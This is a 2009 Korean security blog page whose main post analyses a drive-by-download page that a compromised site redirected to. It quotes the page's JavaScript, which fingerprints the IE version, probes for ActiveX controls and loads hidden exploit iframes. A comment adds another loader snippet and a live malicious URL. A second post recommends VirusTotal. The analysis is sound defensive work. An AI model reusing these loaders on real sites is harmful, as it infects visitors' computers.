데이터넷에 접속하면 http://203.248.195.23/korea.htm 으로 리다렉션 되는듯 합니다.

korea.htm의 내용을 보면 아래와 같습니다.


<html>
<script>
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=100 height=0 src=yt14.htm></iframe>");
document.write("<iframe width=100 height=0 src=ytfl.htm></iframe>");
if(navigator.userAgent.toLowerCase().indexOf("msie 7")>0)
document.write("<iframe src=ytxxz.htm width=100 height=0></iframe>");
try{var b;
var of=new ActiveXObject("snpvw.Snap"+"shot Viewer Control.1");}
catch(b){};
finally{if(b!="[object Error]"){document.write("<iframe width=100 height=0 src=ytff.htm></iframe>");}}
function YuTian222()
{
YuTian = "IERPCtl.IER"+"PCtl.1";
try
{
YiTn = new ActiveXObject(YuTian);
}catch(error){return;}
Tellm = YiTn.PlayerProperty("PRODUCTVE"+"RSION");
if(Tellm<="6.0.14.552")
document.write("<iframe width=100 height=0 src=real.htm></iframe>");
else
document.write("<iframe width=100 height=0 src=yt122121.htm></iframe>");
}
YuTian222();
</script>
</html>

로컬로 접속하면 찝찝하여 백트랙으로 wget으로 긁어 왔습니다.. ㅋㅋㅋ

간단하게 보면 IE버전에 따라 다른htm 파일을 받는군요.

지금 잠깐 강의 시간에 올리는건데 빨리 분석해보고 싶군요.

SIS 카페에서 최초로 신고된듯 합니다.

신고해주신분께 정말 감사.. ㅠㅠ

벌써 몇분이 분석을 하신듯 한데 그분들의 말씀으로는 버전에 따라 다른 htm에서 js 파일을 받는다고 하더군요.

취약성은  Realplayer ActiveX 취약성과 MS08-041 MS Access Snapshot Viewer ActiveX 취약성 이라고 합니다.

취약성은 안다고 해도... 한번쯤 분석해보는게 좋을 듯 싶으니 모두 분석해봅시다 !! ㅋ
  1. Favicon of https://jok3.tistory.com BlogIcon Jok3 2009.03.25 00:09 신고

    몇일전에 대화명의 그것인가보군요...ㅎㅎ

    • Favicon of https://maj3sty.tistory.com BlogIcon MaJ3stY 2009.03.25 00:12 신고

      네 ㅎㅎ;;

      분석을 하려했으나... 해당 사이트 측에서 웹나이트 설치로 페이지가 날라가버린 ㅠㅠ vm에서 백트랙 돌려 받은 터라 백트랙 종료하는 순간 파일도 날라가버렸는데.. ㅠㅠ

  2. Favicon of http://blog.naver.com/yuriblack BlogIcon yuriblack 2009.05.08 09:41

    아.. 나왔다. ㅋㅋ 제가 지금 인턴으로 있는 회사 홈페이지에서 공지게시판에 글쓰기를 누르면 페이지가 느려지거나 익스플로러 응답없음이 되더라구요.. 그리고 왼쪽 아래에 http://wr.jkt57.cn/1/20/hk122121.htm 란 주소가 나오던...
    cn이면 짱껜데 ㄱ-;;;;;; 그 주소로 들어가서 소스보기 하니까

    <SCRIPT>window.onerror=function(){return true;}</SCRIPT>
    <SCRIPT>
    document.writeln("<object classid=\"clsid:CFCDAA03-8B"+"E4-11CF-B84B-0020AFBBCCFA\" style=\'display:none\' id=\'YuTian\'><\/object>";);
    </SCRIPT>
    <script src="Turl.css"></script>
    <script src="real.css"></script>
    <script src="real1.css"></script>

    가 있던데..YuTian으로 검색해서 왔어요 ㅋ 혹시 이것에 대한 해결방법 있나요?
    스크립트는 걍 긁어서 쪼금식 수정하면서 쓸줄만 알지 해킹 같은거 등등 자세히는 잘 몰라서ㅠㅜ (전공도 아니다보니;;)

    • Favicon of https://maj3sty.tistory.com BlogIcon MaJ3stY 2009.05.09 23:01 신고

      회사 전산실이나 보안팀이 있으시면 그쪽으로 연락하시는게 제일 빠른 처리방법일거에요.

      css파일을 받아서 분석해봐야 할 것 같습니다

모든 백신은 100% 바이러스를 잡는 것도 아니며 100% 정확한 진단을 하는 것은 아닙니다.

그렇기에 다른 백신에서는 감지가 되는데 또 다른 백신에서는 감지가 안되는 경우가 있습니다.

이런 확률을 조금이라도 줄이기 위한 사이트가 있는데요.

바이러스 감염에 의심되는 파일을 사이트에 보내어 39개의 백신으로 검사하여 그 결과를 우리에게 보여 주는 사이트 입니다.

물론 한글 사이트 구요 ^^

39개 백신중에서 몇개의 백신이 바이러스 파일로 감지하는지 눈여겨 본다면 어느정도 바이러스 감염파일인지 아닌지 확률을 줄일수가 있을 것입니다.

아래는 사이트 화면 입니다.



http://www.virustotal.com/ko/

모두 바이러스에서 안전한 그날이 오길~


  1. 은쏘이 2009.04.18 21:45

    좋은 정보 감사합니다.^^

+ Recent posts